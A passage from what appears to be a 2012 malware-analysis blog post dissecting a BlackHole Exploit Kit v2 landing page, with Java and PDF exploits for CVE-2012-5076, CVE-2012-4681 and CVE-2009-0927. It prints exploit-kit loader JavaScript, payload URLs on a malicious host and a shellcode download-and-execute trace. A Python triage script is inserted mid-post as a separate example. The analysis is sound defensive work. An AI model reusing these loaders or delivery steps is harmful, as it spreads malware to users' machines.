This leads us to download Inicio.html, which leads to a Spanish photography online store/site; a spam site it is (darn!). But the history of the trojans downloaded from it shows us this is not a good site/IP. We know it is an unhealthy redirector scheme, and God knows what other evil landing pages with redirection schemes exist on this IP..

Samples / References

Samples of this analysis↓ You can download them here-->>[CLICK]
Virus Total Detection Ratio↓
CMUNFWKUWY.html                       4fc7aba0c29053469b9f5c6ff2b04c1b (0/44)
malware.eml                           434b9db6d22b0a09f3adab8ae8ebdf34 (0/44)
Postal_Receipt.exe                    3811ed1d5493d02ee7720f36e31a54c4 (20/44)
Receipt.zip                           f59f065647151aa701c553bea0da44c1 (22/44)
945C33B96395E50D0000945B9F62EA33.exe  62ed7e0847e333064d75555446d92bff (2/44)
↑If you look at these well, the infectors are about 50% detected, but the FakeAV program is only detected by 2 (two) AntiVirus products (ESET & K7). The POINT is that the usage of the crypter made the malware detection ratio smaller.. If you got locked by this mess, below is the unlock key:
AA39754E-715219CE
There are many ways to REMOVE this malware -->>[CLICK] Be careful, friends, when opening UPS emails. Stay Safe!

#MalwareMustDie

Sunday, November 18, 2012

PluginDetect 0.7.9 infector "et" Cridex Payloads of BlackHole Exploit Kit v2 (203.80.16.81) used CVE-2012-4681, CVE-2012-5076, CVE-2009-0927++

I came across PluginDetect 0.7.9 usage in BHEK2 recently.
The software PluginDetect 0.7.9 was released with the following details:
PluginDetect Library
version: 0.7.9
released: 10/17/2012
by Eric Gerds

You can see it yourself on its website here --->>[CLICK]
Or see the capture of the site below (click to enlarge)


If you click the "Download PluginDetect" menu on the left side, you'll see
a javascript generator of PluginDetect, as per picture below:


After you choose your options for which browser components to detect,
this generator will spit out JavaScript code like below:

↑If you look closely at the marked part of the code you will recognize it
as our old friend PluginDetect, as used by BlackHole Exploit Kit v2/BHEK2.

PluginDetect is actually useful, good code for detecting browser plugins;
however BHEK2 and other EKs misuse it for bad purposes.

We know that BHEK2 was previously using PluginDetect 0.7.8, but today I bumped
into an infector using PluginDetect 0.7.9 with CVE-2012-5076, & below is the story:

Hinted by our @Hulk_Crusader, we investigated an infector site at: fi.mattlemons.org
It contains a lot of infector links, as per the snippet below:
   [1]Name          [2]Last modified    [3]Size  
------------------------------------------------
  [5]Jssl.php           16-Nov-2012 05:52   73K
  [6]aVhg.html          11-Nov-2012 06:21  391
  [7]bVhg.html          11-Nov-2012 06:21  611
  [8]bablo5.php         16-Nov-2012 16:05   67
  [9]bind.php           11-Nov-2012 07:24   12K
  [10]faqPkOE.php       11-Nov-2012 07:32  8.2K
  [11]favicon.gif       05-Sep-2011 14:17    0
  [12]favicon.ico       05-Sep-2011 14:17    0
  [13]index.main.php    16-Nov-2012 05:47  4.0K
  [14]info.php          16-Nov-2012 05:49   34K
  [15]jorik5.php        16-Nov-2012 16:05   74
  [16]joy.php           16-Nov-2012 05:49  5.5K
  [17]mainEFjd.php      16-Nov-2012 05:49  8.2K
  [18]mainVjH.php       16-Nov-2012 05:49  8.2K
  [19]page8.htm         16-Nov-2012 15:11  1.0K
  [20]rVhg.html         11-Nov-2012 06:21  744
  [21]sVhg.html         11-Nov-2012 06:21  664
  [22]seo4.php          16-Nov-2012 16:05   70
  [23]sitemapl82.php    16-Nov-2012 05:50  8.2K
  [24]stylecss.php      16-Nov-2012 05:51   24K
  [25]system_file.php   16-Nov-2012 15:11   71
  [26]topsale5.php      16-Nov-2012 16:05   67
  [27]w11292880n.php    16-Nov-2012 05:51   24K
  [28]w11384180n.php    16-Nov-2012 05:52   24K
  [29]w11884808n.php    16-Nov-2012 05:53   24K
  [30]w11991996n.php    16-Nov-2012 05:53   24K
  [31]w12272200n.php    16-Nov-2012 05:54   24K
  [32]w12745201n.php    09-Nov-2012 06:54  303K <=== suspicious
  [33]w14074084n.php    16-Nov-2012 05:54   92K
  [34]w14137042n.php    16-Nov-2012 05:54   92K
  [35]w14455434n.php    16-Nov-2012 05:55   24K
  [36]w15104461n.php    16-Nov-2012 05:56   70K
  [37]w16762030n.php    16-Nov-2012 05:56   24K
  [38]w17886614n.php    16-Nov-2012 05:56   70K
  [39]w18956554n.php    16-Nov-2012 05:57   24K
  [40]w19446592n.php    16-Nov-2012 05:58   24K
  [41]w19572944n.php    16-Nov-2012 05:58   24K
  [42]w20687587n.php    16-Nov-2012 05:58   24K
  [43]w21108783n.php    16-Nov-2012 05:58   24K
  [44]w22312966n.php    16-Nov-2012 06:00   24K
  [45]w24463996n.php    16-Nov-2012 06:00   24K
  [46]w24813801n.php    16-Nov-2012 06:02   24K
  [47]w24912540n.php    16-Nov-2012 06:03   24K
  [48]w25181459n.php    16-Nov-2012 06:05   24K
  [49]w25516725n.php    16-Nov-2012 06:05   92K
  [50]w26388892n.php    09-Nov-2012 06:37  297K <=== suspicious
  [51]w26953552n.php    16-Nov-2012 06:07   92K
  [52]w27341032n.php    16-Nov-2012 06:08   24K
  [53]w27711058n.php    16-Nov-2012 06:10   24K
  [54]w27944845n.php    16-Nov-2012 06:11   24K
  [55]w29438343n.php    16-Nov-2012 12:36   23K
  [56]w32104720n.php    16-Nov-2012 12:36   23K
  [57]w32403343n.php    16-Nov-2012 12:36   23K
  [58]w32844482n.php    16-Nov-2012 12:36   23K
  [59]w33118612n.php    16-Nov-2012 12:36   23K
  [60]w33764801n.php    16-Nov-2012 12:36   23K
  [61]w36011284n.php    16-Nov-2012 12:36   23K
  [62]w36584950n.php    09-Nov-2012 07:36  138K <=== suspicious
  [63]w37531540n.php    16-Nov-2012 12:36   23K
  [64]w37715594n.php    16-Nov-2012 12:36   23K
  [65]w37727072n.php    16-Nov-2012 12:36   23K
  [66]w38297236n.php    16-Nov-2012 12:36   23K
  [67]w38994382n.php    16-Nov-2012 12:36   23K
  [68]w39565125n.php    16-Nov-2012 12:36   23K
  [69]w39715194n.php    16-Nov-2012 12:36   23K
  [70]w41352222n.php    16-Nov-2012 12:36   23K
  [71]w42271663n.php    16-Nov-2012 12:36   92K
  [72]w42595965n.php    16-Nov-2012 12:36   23K
  [73]w43085485n.php    16-Nov-2012 12:36   23K
  [74]w43584820n.php    16-Nov-2012 12:36   23K
  [75]w45042947n.php    16-Nov-2012 12:36   23K
  [76]w48788700n.php    16-Nov-2012 12:36   23K
  [77]w49496620n.php    16-Nov-2012 12:36   23K
  [78]w49977014n.php    16-Nov-2012 12:36   23K
  [79]w51693290n.php    16-Nov-2012 12:36   23K
  [80]w52354703n.php    16-Nov-2012 12:36   23K
  [81]w54253689n.php    16-Nov-2012 12:36   23K
  [82]w54406687n.php    16-Nov-2012 12:36   23K
  [83]w54854224n.php    16-Nov-2012 12:36   23K
  [84]w54924852n.php    16-Nov-2012 12:36   23K
  [85]w55756681n.php    16-Nov-2012 12:36   23K
  [86]w56926790n.php    16-Nov-2012 12:36   69K
  [87]w57142260n.php    16-Nov-2012 12:36   23K
  [88]w57288477n.php    16-Nov-2012 12:36  160K <=== suspicious
  [89]w57363423n.php    16-Nov-2012 12:36   23K
  [90]w57574466n.php    16-Nov-2012 12:36   23K
  [91]w58386696n.php    16-Nov-2012 12:36   23K
  [92]w58414355n.php    16-Nov-2012 12:36   69K
  [93]w58824744n.php    16-Nov-2012 12:36   23K
  [94]w59182790n.php    16-Nov-2012 12:36   23K
  [95]w59615462n.php    16-Nov-2012 12:36   69K
  [96]w59702531n.php    16-Nov-2012 12:36   23K
  [97]w60326763n.php    09-Nov-2012 04:22  275K <=== suspicious
  [98]w61856170n.php    16-Nov-2012 12:36   23K
  [99]w62088643n.php    09-Nov-2012 07:38  161K <=== suspicious
  [100]w64137644n.php   16-Nov-2012 12:36  115K <=== suspicious
  [101]w64214598n.php   16-Nov-2012 12:36   69K
  [102]w64908493n.php   16-Nov-2012 12:36   23K
  [103]w64956301n.php   16-Nov-2012 12:36   23K
  [104]w65944817n.php   16-Nov-2012 12:36   92K
  [105]w65994077n.php   16-Nov-2012 12:36   23K
  [106]w66442417n.php   16-Nov-2012 12:36   23K
  [107]w67063022n.php   16-Nov-2012 12:36   23K
  [108]w67424797n.php   16-Nov-2012 12:36   69K
  [109]w68083912n.php   16-Nov-2012 12:36   92K
  [110]w68562749n.php   16-Nov-2012 12:36   23K
  [111]w69423332n.php   16-Nov-2012 12:36   23K
  [112]w69863913n.php   16-Nov-2012 12:36  115K <=== suspicious
  [113]w71004261n.php   16-Nov-2012 12:36   23K
  [114]w71254201n.php   16-Nov-2012 12:36   23K
  [115]w71703411n.php   16-Nov-2012 12:36   23K
  [116]w72627688n.php   16-Nov-2012 12:36   23K
  [117]w74483378n.php   16-Nov-2012 12:36   23K
  [118]w75274537n.php   16-Nov-2012 12:36  115K <=== suspicious
  [119]w78731488n.php   16-Nov-2012 12:36   92K
  [120]w80343543n.php   16-Nov-2012 12:36  160K <=== suspicious
  [121]w80903025n.php   09-Nov-2012 05:28  297K <=== suspicious
  [122]w81115093n.php   16-Nov-2012 12:36   23K
  [123]w81417750n.php   16-Nov-2012 12:36   23K
  [124]w82277330n.php   16-Nov-2012 12:36   69K
  [125]w82347261n.php   16-Nov-2012 12:36   23K
  [126]w84467943n.php   16-Nov-2012 12:36   23K
  [127]w85902715n.php   16-Nov-2012 12:36   69K
  [128]w86577171n.php   16-Nov-2012 12:36   23K
  [129]w86771427n.php   16-Nov-2012 12:36   23K
  [130]w86911411n.php   16-Nov-2012 12:36   23K
  [131]w86982141n.php   16-Nov-2012 12:36   92K
  [132]w87326315n.php   16-Nov-2012 12:36   23K
  [133]w88145056n.php   16-Nov-2012 12:36   92K
  [134]w88205733n.php   16-Nov-2012 12:36  137K <=== suspicious
  [135]w88685477n.php   16-Nov-2012 12:36   23K
  [136]w89338108n.php   16-Nov-2012 12:36   23K
  [137]w89476290n.php   16-Nov-2012 12:36  137K <=== suspicious
  [138]w89705559n.php   16-Nov-2012 12:36   23K
  [139]wp-conf.php      15-Nov-2012 22:26  185K <=== suspicious
*) I marked the suspicious files above↑ I bet they are trojan malware! (Hint: see the size of the files.) Sadly the web server is well tuned & uses an ACL to block access, so we successfully fetched only some files, as below:
aVhg.html     2a3e59f3088c06329e01acc3f4392e6f
bablo5.php    0423f6942706d9b36fc5551b472f12d9
jorik5.php    6e1a175421632987e00a589a93653e56
seo4.php      89cfb895e3381c2f174ef24e8c664839
topsale5.php  5e9eb5ddf71e1b4c56375c85aae92c69
page8.htm     57f31d9fc68cc28f1051028d761d8afc
All ↑files are mostly spam redirectors, but page8.htm contains malicious code, which we decoded easily to be like this: ↑It shows a malicious URL of the BHEK pattern. Shortly after, we fetched it, & from the TCP/HTTP data we can be sure it is BHEK:
--21:17:54--  
h00p://203.80.16.81:8080/forum/links/column.php
Connecting to 203.80.16.81:8080... seconds 0.00, connected.
Created socket 1920.
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie is knocking on your door |-(
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 17 Nov 2012 20:40:41 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
Closed fd 1920
21:17:56 (43.56 KB/s) - `column.php' saved [31778]
The downloaded file contains condensed JavaScript, as in the snipped code below:
<html><head><title></title></head><body><script>try{if(window.document)window.document.body="asd"}catch(e
{var PluginDetect={version:"0.7.9",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}}
nction(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]
umRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){re
test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.i
j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){
(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeT
);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a<d.length;a++){if(c>-1&&a
if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[...
You can see the full original code in our pastebin -->>[PASTEBIN] and a nicely readable version can be seen here -->>[PASTEBIN]
Looking at the decoded code, we can see the PluginDetect 0.7.9 logic is used in it. The EK coder is misusing the PluginDetect 0.7.9 base code for infection purposes, and as soon as PluginDetect 0.7.9 was officially released it was already being used by infectors. Compared to the BHEK2 with the previous PluginDetect 0.7.8, this version uses a similar method; however some changes were detected, as per the following summary:
Provided Exploits:
Msxml2.XMLHTTP
Msxml2.DOMDocument
Microsoft.XMLDOM
ShockwaveFlash.ShockwaveFlash
TDCCtl.TDCCtl
Shell.UIHelper
Scripting.Dictionary
wmplayer.ocx
Browser Access: accepting only access from these platforms, matched in the browser's headers ;-))
"Win",
"Mac",
"Linux",
"FreeBSD",
"iPhone",
"iPod",
"iPad",
"Win.*CE",
"Win.*Mobile",
"Pocket\s*PC"
Strictly gets the version info of the browser engines...
d.isGecko=(/Gecko/i).test(k)&&(/Gecko\s*\/\s*\d/i).test(l);
d.verGecko=d.isGecko?d.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(l)?RegExp.$1:"0.9"):null;
d.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(l);
d.verChrome=d.isChrome?d.formatNum(RegExp.$1):null;
d.isSafari=((/Apple/i).test(j)||(!j&&!d.isChrome))&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(l);
d.verSafari=d.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(l)?d.formatNum(RegExp.$1):null;
d.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(l);
d.verOpera=d.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(l)||1)?parseFloat(RegExp.$1,10):null;
d.addWinEvent("load",d.handler(d.runWLfuncs,d))

Infector plugins:

1. Java Exploit
mimeType:"application/x-java-applet","application/x-java-vm", "application/x-java-bean"],classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"
Aimed at generic exploitation affecting the Java versions below:
[1,9,1,40]
[1,8,1,40]
[1,7,1,40]
[1,6,0,40]
[1,5,0,30]
[1,4,2,30]
[1,3,1,30]]
It also provides special handling for the specific Java versions below:
k=[1,5,0,14],
j=[1,6,0,2],
h=[1,3,1,0],
g=[1,4,2,0],
f=[1,5,0,7]
2. Flash Exploit
mimeType:"application/x-shockwave-flash",progID:"ShockwaveFlash.ShockwaveFlash" ,classID:"clsid:D27CDB6E-AE6D-11CF-96B8-444553540000"
Replacing the downloaded object by this into exe in locals...
return e?e[0].replace(/[rRdD\.]/g,",").replace(/\s/g,""):null
3. Adobe Reader
mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"], classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000"
The logic to check the Adobe Reader version is:
if(pdfver[0]>0&&pdfver[0]<8)
(pdfver[0]==8||(pdfver[0]==9&&pdfver[1]<4)
//Hint!
[Important!] New: makeSense function
We detected a new control, the makeSense() function, to check the PDF & Java versions; it uses the applet code below to get & pass the version & vendor info:
import java.applet.Applet;

public class A extends Applet
{
  public String getAppVersion()
  {
    return "3";
  }

  // Reads a system property by name; returns "" if it cannot be read
  public String getProp(String paramString)
  {
    String str = "";
    try {
      if ((paramString instanceof String)) str = System.getProperty(paramString);
    }
    catch (Exception localException) {
    }
    return str;
  }

  public String getVersion()
  {
    return getProp("java.version");
  }

  public String getVendor()
  {
    return getProp("java.vendor");
  }

  public void statusbar(String paramString)
  {
    try
    {
      if ((paramString instanceof String)) showStatus(paramString);
    }
    catch (Exception localException)
    {}
  }
}
Let's go back to our case. This infection uses PluginDetect 0.7.9, so if we hit the j1 and j2 parameters correctly there are 2 (two) JAR malware downloads, as coded below:
function j1() {
  var d=document.createElement("div");
  d.innerHTML = '<applet archive="../data/spn2.jar" code="impossibla">' +
    '<param name="val" value="0b0909041f"/>' +
    '<param name="prime" value="3131271c083c181c3c37343c18371f181c181c312c174421233143323a11193138174321233a3c040b043d112c39081c1f373a1f37321f37321f080802043539270e1f37111f37231f08271f08081f37111f37111f08371f37361f3717020139372c02170e392802382c390b"/></applet>';
  document.body.appendChild(d);
  return true;
}
function j2() {
  var d=document.createElement("div");
  d.innerHTML = '<applet archive="../data/spn.jar" code="impossibla">' +
    '<param name="val" value="0b0909041f"/>' +
    '<param name="prime" value="3131271c083c181c3c37343c18371f181c181c312c174421233143323a11193138174321233a3c040b043d112c39081c1f373a1f37321f37321f080802043539270e1f37111f37231f08271f08081f37111f37111f08371f37361f3717020139370502170e392802382c390b"/></applet>';
  document.body.appendChild(d);
  return true;
}
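When triaging a landing page like this one, the quickest static win is to pull the applet tags out of the markup the loader functions build and list which archives they load and which parameters carry opaque hex blobs (the "val"/"prime" values above). As an added example (not code from the post or the kit), here is a small Python extractor that does that; the sample HTML is constructed from the markup j1() above builds, with the long "prime" value shortened:

```python
"""Static triage of an EK landing page: list every <applet>, the archive it
loads and any all-hex <param> values.  Added example, not code from the post."""
import re

APPLET_RE = re.compile(r"<applet\b([^>]*)>(.*?)</applet>", re.I | re.S)
ATTR_RE = re.compile(r'(\w+)\s*=\s*"([^"]*)"')
PARAM_RE = re.compile(r"<param\b([^>]*)/?>", re.I)
HEX_RE = re.compile(r"^(?:[0-9a-f]{2})+$", re.I)

# Constructed sample: the markup j1() above injects, written out as plain
# HTML with the 'prime' value truncated for readability.
SAMPLE_HTML = (
    '<html><body><div>'
    '<applet archive="../data/spn2.jar" code="impossibla">'
    '<param name="val" value="0b0909041f"/>'
    '<param name="prime" value="3131271c083c181c3c37343c18371f"/></applet>'
    '</div></body></html>'
)

# Constructed benign applet for comparison: no archive, no hex parameters.
BENIGN_HTML = '<applet code="Hello.class" width="100"><param name="msg" value="hi"/></applet>'

def extract_applets(html):
    """Return one dict per <applet>: archive, code, and params {name: value}."""
    found = []
    for m in APPLET_RE.finditer(html):
        attrs = dict(ATTR_RE.findall(m.group(1)))
        params = {}
        for pm in PARAM_RE.finditer(m.group(2)):
            pa = dict(ATTR_RE.findall(pm.group(1)))
            if "name" in pa:
                params[pa["name"]] = pa.get("value", "")
        found.append({"archive": attrs.get("archive"),
                      "code": attrs.get("code"),
                      "params": params})
    return found

def suspicious_applets(html):
    """Flag applets that load an archive and pass at least one parameter that
    is nothing but hex bytes (opaque data for the applet to decode), as the
    spn.jar/spn2.jar loaders above do.  Returns the archive, the entry class
    and the hex parameter names with their decoded lengths in bytes."""
    out = []
    for a in extract_applets(html):
        hex_params = {n: len(bytes.fromhex(v))
                      for n, v in a["params"].items() if HEX_RE.match(v)}
        if a["archive"] and hex_params:
            out.append({"archive": a["archive"], "code": a["code"],
                        "hex_params": hex_params})
    return out

if __name__ == "__main__":
    for hit in suspicious_applets(SAMPLE_HTML):
        print(hit)
```

The archive paths it reports ("../data/spn2.jar" here) are exactly the URLs to pull next from a capture or a proxy log, and the hex parameter lengths tell you how much decoded data the applet receives, which is a useful hint when comparing two landing pages of the same kit.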
Tracing the path, we get the JARs as below:
--00:25:07--  h00p://203.80.16・81:8080/forum/data/spn.jar
           => `spn.jar'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,745 (12K) [application/java-archive]
00:25:09 (37.62 KB/s) - `spn.jar' saved [12745/12745]

--00:25:14--  h00p://203.80.16・81:8080/forum/data/spn2.jar
           => `spn2.jar'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21,607 (21K) [application/java-archive]
00:25:16 (49.66 KB/s) - `spn2.jar' saved [21607/21607]
These files are Java exploiters. There is abuse code of java.lang.String.inter (CVE-2012-5076) in "spn.jar", and also CVE-2012-4681 & CVE-2012-1723 in "spn2.jar", used to exploit + download the payload. We will soon be discussing these exploits. Some network operation strings in both files can be seen, like:
* * * File: spn.jar
import java.net.URL;
 41: invokevirtual 51 java/lang/Class:getResource (Ljava/lang/String;)Ljava/net/URL;
 44: invokevirtual 55 java/net/URL:toString ()Ljava/lang/String;
103: new     56 java/net/URL
 :
106: dup
107: aload 4
109: invokespecial 71 java/net/URL: (Ljava/lang/String;)V
 :
137: checkcast     84 java/net/URLConnection
140: astore        6
142: aload         6
144: invokevirtual 86 java/net/URLConnection:getInputStream ()Ljava/io/InputStream;

* * * File: spn2.jar
import java.net.URL;
 49: invokevirtual 232 java/lang/Class:getResource (Ljava/lang/String;)Ljava/net/URL;
 52: invokevirtual 236 java/net/URL:toString ()Ljava/lang/String;
113: new            68 java/net/URL
116: dup
117: aload 5
119: invokespecial 70 java/net/URL: (Ljava/lang/String;)V
148: checkcast    260 java/net/URLConnection
151: astore         7
153: aload          7
155: invokevirtual 262 java/net/URLConnection:getInputStream ()Ljava/io/InputStream;
Below is the exploit CVE-2012-5076 code used in spn.jar (click to enlarge). And below is the CVE-2012-4681 code used in spn2.jar to download the mess.. (click to enlarge)
↑It is at public static void impossibla(impossibld paramimpossibld) and in public Object impossibla().
As advised by @Dr4g0nFlySm0k3, in "spn2.jar" at public class impossiblb we also detected CVE-2012-1723 exploit code, as snipped below (core code only).
PS: There is a quite long list of variables for gaining "type confusion" between a static & an instance variable for this exploit; I snipped them all in the snapshot above. For more details please check the downloadable sample files provided at the link at the bottom of the post.
[NEW] I was just mentioned on Twitter, thanks to @PhysicalDrive0, that Java exploits always come in threes; below is the message:
The first response I did was to re-read PluginDetect 0.7.9 and be 100% sure that there is no sign of spn3.jar in there. Next, I checked the last fetched spider logs.. couldn't find it there either. But I just tried to download it by following the path of spn.jar & spn2.jar and....
--2012-11-18 22:14:07--  h00p://203.80.16.81:8080/forum/data/spn3.jar
Connecting to 203.80.16.81:8080... connected.
Created socket 3.
---request begin---
GET /forum/data/spn3.jar HTTP/1.1
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie is knocking AGAIN on your door! |-((
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 18 Nov 2012 21:37:08 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Mon, 22 Oct 2012 13:35:13 GMT
ETag: "1350005-521e-4cca5ec4d4640"
Accept-Ranges: bytes
Content-Length: 21022
---response end---
200 OK
Registered socket 3 for persistent reuse.
Length: 21022 (21K) [application/java-archive]
Saving to: `spn3.jar'
100%[=============>]21,022      43.2K/s   in 0.5s
2012-11-18 22:14:08 (43.2 KB/s) - `spn3.jar' saved [21022/21022]
↑By God, there is a spn3.jar!! But why? Not being in PluginDetect means no chance of infection.. Here's the snapshot; ↓it shows the file's upload date...
-rw-r--r--  1 xxx xxx  21022 Oct 22 22:35 spn3.jar
MD5 (spn3.jar) = 66c55d2cebc9d2d7b09a6e12b94fc1c9
So let's see what exploit it has inside. First, in the public class fewwebwegb it has CVE-2012-0507↓ Second, in the public class fewwebwegc it has CVE-2012-4681 exploit code↓ ↑These two exploits double-hit the victim's PC to break Java's privilege.. [NEW] There is also another file called "t.pdf" which is not referenced in the PluginDetect code (thanks again to @PhysicalDrive0 for the hint); it is as below:
--01:39:46--  h00p://203.80.16.81:8080/forum/data/t.pdf
           => `t.pdf'
Connecting to 203.80.16.81:8080... seconds 0.00, connected.
Created socket 1920.
---request begin---
GET /forum/data/t.pdf HTTP/1.0
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie Now BANGING at your Door ||-((
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 19 Nov 2012 01:02:39 GMT
Content-Type: application/pdf
Connection: keep-alive
Last-Modified: Fri, 14 Sep 2012 18:03:02 GMT
ETag: "13500e4-1fa7-4c9ad3c1e8180"
Accept-Ranges: bytes
Content-Length: 8103
---response end---
200 OK
Registered socket 1920 for persistent reuse.
Length: 8,103 (7.9K) [application/pdf]
01:39:47 (78.02 KB/s) - `t.pdf' saved [8103/8103]

$ ls -alF t.*
-rwx------   1 xxx xxx   8103 Sep 14 09:03 t.pdf
$ md5 t.pdf
MD5 (t.pdf) = d1e2ff36a6c882b289d3b736d915a6cc
It is a common Pidief exploit shellcode downloader; its xref table (below) is invalid, and it calls obfuscated code that is extracted as shellcode:
0000000004 00000 f
0000000772 00000 n
0000001087 00000 n
0000001137 00000 n
0000000000 00000 f
0000000000 65535 f
0000001284 00000 n
   :         :
0000035752 00000 n
0000036095 00000 n
0000000026 65535 f
0000000050 65535 f
0000000051 65535 f
This sample has the highest detection ratio compared to the other samples here:
MD5:          d1e2ff36a6c882b289d3b736d915a6cc
File size:    7.9 KB ( 8103 bytes )
File name:    t.pdf
File type:    PDF
Tags:        pdf acroform invalid-xref
Detection ratio:  22 / 43
URL: https://www.virustotal.com/file/1e9e19cc0e6c49f658f6205d19d3940698cbe22df6cdb149c8178857992473e7/analysis/
There is also a p1() function, coded as below, that drops one more malicious PDF:
function p1() {
  var d = document.createElement("div");
  d.innerHTML = "<iframe src=\"/forum/links/column.php?xrdbmuu=" + x("c833f") + "&sckq=" + x("laa") + "&bugeh=2v:1k:1m:32:33:1k:1k:31:1j:1o&hdulmrim=" + x(pdfver.join(".")) + "\"></iframe>";
  document.body.appendChild(d);
}
Decoding this PDF download URL wasn't hard; it took me 2 minutes to figure out the url :-) Here's the proof:
--01:28:48--  h00p://203.80.16。81:8080/forum/links/column.php?xrdbmuu=30:1n:1i:1
i:33&sckq=39:2v:2v&bugeh=2v:1k:1m:32:33:1k:1k:31:1j:1o&hdulmrim=1o:1d:1g:1d:1f
           => `column.php@xrdbmuu=30%3A1n%3A1i%3A1i%3A33&sckq=39%3A2v%3A2v&bugeh
=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&hdulmrim=1o%3A1d%3A1g%3A1d%3A1f
'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,788 (27K) [application/pdf]

01:28:50 (47.09 KB/s) - `column.php@xrdbmuu=30%3A1n%3A1i%3A1i%3A33&sckq=39%3A2v%
3A2v&bugeh=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&hdulmrim=1o%3A1d%3A1g
%3A1d%3A1f' saved [27788/27788]
And here are my notes from decoding it manually:
a=x("c833f");
   function x(s)
   {
     d=[];
     for(i=0;i   [the rest of the loop and the return were lost from this note]
   }
   ===> "30:1n:1i:1i:33"

a=x("laa");
   (same x() as above)
   ===> "39:2v:2v"

pdfver="9.1.0"
mypdf=(pdfver.join("."));
a=x(mypdf);
   (same x() as above)
   ===> "1o:1d:1g:1d:1f"
At offset 0x3CD5 in the PDF file we can see this malicious code -->>[PASTEBIN] ↑We saw that the string "parseInt(app.beep(0)).toString().substring(1,2)" is used 122 times :-) app.beep is a typical Acrobat JavaScript function; the one-digit integer that results is the key. Example:
x="17777".toString().substring(1,2)
document.write(x); ===> "7"
↑Using the hint above, the deobfuscated code is --->>[PASTEBIN] The exploit code for CVE-2009-0927 is here: And also an obfuscated shellcode here (see the var bjsg value): The shellcode itself contains a "plain" download url: ↑It must've been copy-paster level work of malware retards :-) Well, the url to download the payload is as below:
h00p://203.80.16.81:8080/forum/links/column.php?vfg=30:1n:1i:1i:33&cacjp=2v:1k:1m:32:33:1k:1k:31:1j:1o&zbrybx=1h&gfh=xdoq&hsphg=edixgidl
Download Proof:
 --03:22:55--  h00p://203.80.16.81:8080/forum/links/column.php?vfg=30:1n:1i:1i:33&cacjp=2v:1k:1m:32:33:1k:1k:31:1j:1o&zbrybx=1h&gfh=xdoq&hsphg=edixgidl
Connecting to 203.80.16.81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 122,727 (120K) [application/x-msdownload]
100%[====================================>] 122,727      108.68K/s
03:22:57 (108.52 KB/s) - `column.php@vfg=....' saved [122727/122727]
The shellcode API calls (kernel32.dll & urlmon.dll) used for the download are as below:
kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
kernel32.LoadLibraryA(lpFileName=urlmon)
kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://203.80.16.81:8080/forum/....., lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 
kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 
kernel32.TerminateThread(dwExitCode=0)
So we saved the payload as wpbt0.dll and quickly examined it, with the results below... This malware drops the files below before deleting itself:
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp.bat
C:\Documents and Settings\Administrator\Application Data\KB00695911.exe
using CMD.EXE, which executed the command below:
C:\WINDOWS\system32\cmd.exe
  |
